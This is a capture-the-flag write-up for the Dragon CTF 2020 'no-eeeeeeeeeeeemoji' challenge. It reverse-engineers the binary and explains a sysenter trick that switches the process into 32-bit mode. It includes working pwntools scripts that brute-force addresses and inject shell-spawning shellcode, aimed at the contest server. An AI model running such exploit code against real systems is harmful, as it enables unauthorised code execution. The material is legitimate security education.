Contents

Dragon CTF 2020 - no-eeeeeeeeeeeemoji Writeup

Variation on the theme of 0ctf’s eeemoji.
This challenge is running on Ubuntu 18.04.

nc noemoji.hackable.software 1337

Unfortunately, we didn’t have the time to play this really awesome CTF but I got some time to have a look at the PWN challenges at the beginning of the CTF and this one really got my attention. I tried playing with it whenever I had time during the CTF but I got stuck and couldn’t solve it before the CTF ended. I joined the IRC, knew what the intended solution was and here’s me trying to understand and reproduce it:

Checking the given binary and its security flags

Running the binary we get the memory mappings of the process then we’re presented with a menu

Static Analysis

Throwing the binary to IDA and jumping right into the main function

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
__int64 __fastcall main(const char *a1, char **a2, char **a3)
{
  char v4; // [rsp+6h] [rbp-Ah]
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  while ( 1 )
  {
    sub_17B9();
    if ( !sub_1259(0, &v4, 2uLL) )
      return 0LL;
    if ( v4 == 'h' )
    {
      sub_16A7();
    }
    else
    {
      if ( v4 > 'h' )
        goto LABEL_11;
      if ( v4 == 'b' )
      {
        sub_14F7();
      }
      else if ( v4 == 'c' )
      {
        puts("Please contact our Sales Team for premium offers!");
      }
      else
      {
LABEL_11:
        puts("Invalid option!");
      }
    }
  }
}

There are four function used inside the main which are:

  • sub_17B9
  • sub_1259
  • sub_16A7
  • sub_14F7

Given that we already know the options from the runtime, we can see that the cow option c is useless so we’re left with both beer and horse options.

sub_17B9 simply prints the menu we saw at the runtime

1
2
3
4
5
6
7
8
9
int sub_17B9()
{
  return puts(
           "\n"
           "Welcome to a no-eeeeeeeeeeeemoji\n"
           "[h]orse: Don't frighten my horse.\n"
           "[c]ow: Miaow miaow miaow (only premium users)\n"
           "[b]eer: cow beer\n");
}

sub_1259 reads bytes with a given size

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
unsigned __int64 __fastcall sub_1259(int a1, __int64 a2, unsigned __int64 a3)
{
  unsigned __int64 v4; // [rsp+8h] [rbp-28h]
  unsigned __int64 v5; // [rsp+20h] [rbp-10h]
  ssize_t v6; // [rsp+28h] [rbp-8h]

  v4 = a3;
  v5 = 0LL;
  while ( v5 < v4 )
  {
    v6 = read(a1, (v5 + a2), v4 - v5);
    if ( v6 >= 0 )
    {
      if ( !v6 )
        return v5;
      v5 += v6;
    }
    else if ( *__errno_location() != 4 && *__errno_location() != 11 && *__errno_location() != 11 )
    {
      err(1, "read");
    }
  }
  return v5;
}

Before jumping into the beer and horse functions lets look at a function in the _init_array

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
unsigned __int64 sub_1412()
{
  unsigned int v0; // eax
  void (__noreturn *v2)(); // [rsp+0h] [rbp-A0h]
  unsigned __int64 v3; // [rsp+98h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  sub_1306();
  v0 = time(0LL);
  srand(v0);
  memset(&v2, 0, 0x98uLL);
  v2 = sub_13F1;
  if ( sigaction(14, &v2, 0LL) < 0 )
    err(1, "sigaction");
  alarm(300u);
  return v3 - __readfsqword(0x28u);
}

It simply initialize the buffers, calls sub_1306 then calls alarm with 300 seconds that will result in a call to sub_13F1

Looking at sub_1306, it’s the function printing the memory mappings.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned __int64 sub_1306()
{
  int fd; // [rsp+Ch] [rbp-1014h]
  char s[8]; // [rsp+10h] [rbp-1010h]
  __int64 v3; // [rsp+18h] [rbp-1008h]
  char v4; // [rsp+20h] [rbp-1000h]
  unsigned __int64 v5; // [rsp+1018h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  fd = open("/proc/self/maps", 0);
  if ( fd < 0 )
    err(1, "open maps");
  *s = 0LL;
  v3 = 0LL;
  memset(&v4, 0, 0xFF0uLL);
  sub_1259(fd, s, 0xFFFuLL);
  puts(s);
  if ( close(fd) < 0 )
    err(1, "close");
  return v5 - __readfsqword(0x28u);
}

After 300 seconds sub_13F1 is called which simply calls exit

1
2
3
4
5
void __noreturn sub_13F1()
{
  puts("Time's up!");
  _exit(0);
}

Diving into the functions we’ll focus on. Lets start with sub_14F7 (the beer function) first:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
int sub_14F7()
{
  void *addr; // [rsp+Ch] [rbp-4h]

  do
    LODWORD(addr) = rand() % 1000 << 12;
  while ( addr <= 0xFFFF );
  qword_40F0 = mmap(addr, 0x1000uLL, 7, 50, -1, 0LL);
  if ( qword_40F0 == -1LL )
    err(1, "mmap");
  dword_40F8 = 1;
  return printf("map() at @%p\n", qword_40F0);
}

It generates a random base address greater than 0xFFFF then maps 0x1000 bytes at that address with RWX permissions and stores the pointer to the allocated memory in the global variable qword_40F0. It then sets the global variable dword_40F8 to 1. Finally, it prints qword_40F0.

Finally, lets have a look at sub_16A7 (the horse function)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
__int64 sub_16A7()
{
  char *v0; // rdi

  if ( !dword_40F8 )
    errx(1, "you scared my horse");
  memset(qword_40F0, 'A', 4096uLL);
  puts("gib:");
  sub_1259(0, qword_40F0, 4096uLL);
  memcpy(qword_40F0 + 1024, &loc_15B1, (&loc_1668 + 1) - &loc_15B1);
  memset(qword_40F0 + 256, 'A', 256uLL);
  memset(qword_40F0 + 514, 'A', 254uLL);
  v0 = qword_40F0 + 514;
  memcpy(qword_40F0 + 514, &loc_1668 + 1, sub_16A7 - (&loc_1668 + 1));
  return ((qword_40F0 + 1024))(v0, &loc_1668 + 1);
}

It first checks the dword_40F8 to make sure we used the beer function first. Then it does the following:

  • Sets the 4096 bytes in qword_40F0 to ‘A’
  • Takes input of 4096 bytes into qword_40F0
  • Copies a shellcode from loc_15B1 into qword_40F0 + 1024
  • Sets 256 bytes to ‘A’ starting from qword_40F0 + 256
  • Sets 254 bytes to ‘A’ starting from qword_40F0 + 514
  • Copies another shellcode from loc_1668 into qword_40F0 + 514
  • Calls the shellcode at qword_40F0 + 1024

Before jumping into these shellcodes let’s first simplify how qword_40F0 will look like after all these operations:

1
2
3
4
5
6
7
256 bytes of our input
256 bytes filled with 'A's
2 bytes of our input
254 bytes of shellcode from loc_1668 padded with 'A's
256 bytes of our input
184 bytes of shellcode from loc_15B1
2888 bytes of our input

Lets dig into the shellcodes starting with the one at loc_15B1 as it’s executed first

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
sub     rsp, 0x8000
mov     eax, 41h ; 'A'
lea     rdi, [rsp-0x8000]
mov     rcx, 0x10000
rep     stosb
mov     rax, 0xdeadbeefdeadbeef
mov     rbx, 0xdeadbeefdeadbeef
mov     rcx, 0xdeadbeefdeadbeef
mov     rdx, 0xdeadbeefdeadbeef
mov     rdi, 0xdeadbeefdeadbeef
mov     rsi, 0xdeadbeefdeadbeef
mov     rbp, 0xdeadbeefdeadbeef
mov     r8, 0xdeadbeefdeadbeef
mov     r9, 0xdeadbeefdeadbeef
mov     r10, 0xdeadbeefdeadbeef
mov     r11, 0xdeadbeefdeadbeef
mov     r12, 0xdeadbeefdeadbeef
mov     r13, 0xdeadbeefdeadbeef
mov     r14, 0xdeadbeefdeadbeef
mov     r15, 0xdeadbeefdeadbeef
jmp     0xfffffffffffffd4d

As we can see it fills the stack with a 0x10000 ‘A’ starting from rsp-0x8000 then it moves 0xdeadbeefdeadbeef into all registers and finally jumps backwards (to the 2 bytes before the second shellcode).

The other shellcode which is at loc_1668 prints the first 38 bytes in qword_40F0 then terminates the program.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
lea     rsi, [rip+0xfffffffffffffde7]
mov     rdi, 1
mov     rdx, 0x26
mov     rax, 1
syscall
mov     rdi, 0
mov     rax, 0x3c
syscall

Dynamic Analysis

So far we know that we have 2 bytes that will be executed before the second shellcode but lets confirm that using the following script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *

def choose_from_menu(choice):
    io.sendlineafter('beer\n\n', choice)

def beer():
    choose_from_menu('b')
    io.recvuntil('@')
    address = int(io.recvline()[:-1], 16)
    return address

io = process('main')
gdb.attach(io)
maps = io.recvuntil('\n\n')
mmap = beer()
info('mmap: {}'.format(hex(mmap)))

payload = 'B' * (512)
payload += '\xcc\xcc'
payload += 'B' * (4096 - len(payload))

choose_from_menu('h')
io.sendlineafter('gib:\n', payload)
io.interactive()

As a matter of fact our analysis was correct and we have 2 executable bytes that we control

The first thing that came to mind at this point was that we need to find a way to jump forwards or backwards to reach a bigger part of the allocated memory that we control. To approach this we thought of three ways:

  • A short jump but unfortunately that only works for a maximum jump of 127 bytes forwards or backwards but we need at least a 256 bytes jump to reach our input.
  • A near or far jumps padded with the nops that are already present.
  • Bruteforcing the two bytes with the rest of our input as \xcc and look for SIGTRAP

But non of the above worked so I got stuck at this point and couldn’t think of anything more. After the CTF, I joined the IRC and many was asking about the solution as the challenge had only 1 solve and what I understood from the ongoing conversation:

Use a sysenter. The kernel considers sysenter is called only in a 32bit context, so returning from a sysenter system call with sysexit, it returns back to to a 32bit address stored in a register which points to the middle of vdso vsyscall (in vdso 32-bit version)

Right after reading I decided to read some more before I try it out to understand why it all happens. Using this reference, I understood the following:

  • Usually when the sysenter is called from a userland program it is called via __kernel_vsyscall which is available in the 32bit version of vdso. As a result the kernel downgrades the userland context into 32bit.
  • When sysexit tries to return to the userland it calculates the address to return to in the __kernel_vsyscall which will be a 32bit address.

I’m still not sure if I understand the whole thing in a correct way so if I’m stating anything incorrectly please reach out to me so I can fix it. I adjusted my script to try out this new trick I learned:

It works like a charm but notice that rsp also has changed as we’ll need that later on.

Exploitation

Now we have all the parts we need to start crafting our exploit. The steps of exploitation will be as follows:

  • Bruteforce the vdso till the lower 32bit are achievable by our beer function.
  • Bruteforce the beer function until we get an address equal to the lower 32bit of the vdso.
  • Find the part that we return to in our input and replace it with a 32bit shellcode.

First, to bruteforce the vdso we have to remember the snippet responsible for generates the random address LODWORD(addr) = rand() % 1000 << 12;. Given that, we need the lower 32bit of vdso to be smaller than 1000 << 12 which is 0x3e8000. With that in mind we wrote the following script that does all three steps:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *

def get_vdso():
    maps = io.recvuntil('[vdso]').split('\n')[-1]
    vdso = int('0x' + maps.split('-')[0], 16)
    vdso = (vdso & 0xffffffff)
    return vdso

def choose_from_menu(choice):
    io.sendlineafter('beer\n\n', choice)

def beer():
    choose_from_menu('b')
    io.recvuntil('@')
    address = int(io.recvline()[:-1], 16)
    return address

l = log.progress('brutforcing vdso: ')
while True:
    io = process('main', level='error')
    vdso = get_vdso()
    l.status(hex(vdso))
    if vdso < 0x3e8000:
        break
    io.close()
l.success('success!')
info('vdso: {}'.format(hex(vdso)))

l = log.progress('brutforcing mmap: ')
while True:
    mmap = beer()
    l.status(hex(mmap))
    if mmap == vdso:
        break
l.success('success!')
info('mmap: {}'.format(hex(mmap)))

payload = '\xcc' * (512)
payload += '\x0f\x34'
payload += '\xcc' * (4096 - len(payload))

choose_from_menu('h')
io.sendlineafter('gib:\n', payload)
io.interactive()

We actually hit a our input at the offset 0xb5a which is at the last part of our input.

Now, lets add a 32bit shellcode -as we’re now downgraded to 32bit- instead of the breakpoints but before the shellcode we need to adjust the stack pointer to point to a valid writable memory location which I chose to be mmap + 512

1
2
3
4
5
6
shellcode = asm('mov esp, {}\n'.format(mmap + 512) + shellcraft.i386.sh())

payload = '\x90' * (512)
payload += '\x0f\x34'
payload += '\x90' * (4096 - len(payload) - len(shellcode))
payload += shellcode

Then we switch to the remote server instead of locally by changing io = process('main', level='error') to io = remote('noemoji.hackable.software', 1337, level='error') and WE GET THE FLAG!

I really loved this challenge and the new stuff I got to learn by attempting to solve it. It actually made me regret even more not having time to play the CTF but at least I got to learn a new thing ¯\_(ツ)_/¯ DrgnS{H0p3_y0u_d1dn7_jUsT_brUt3_y0ur_sOlu710n}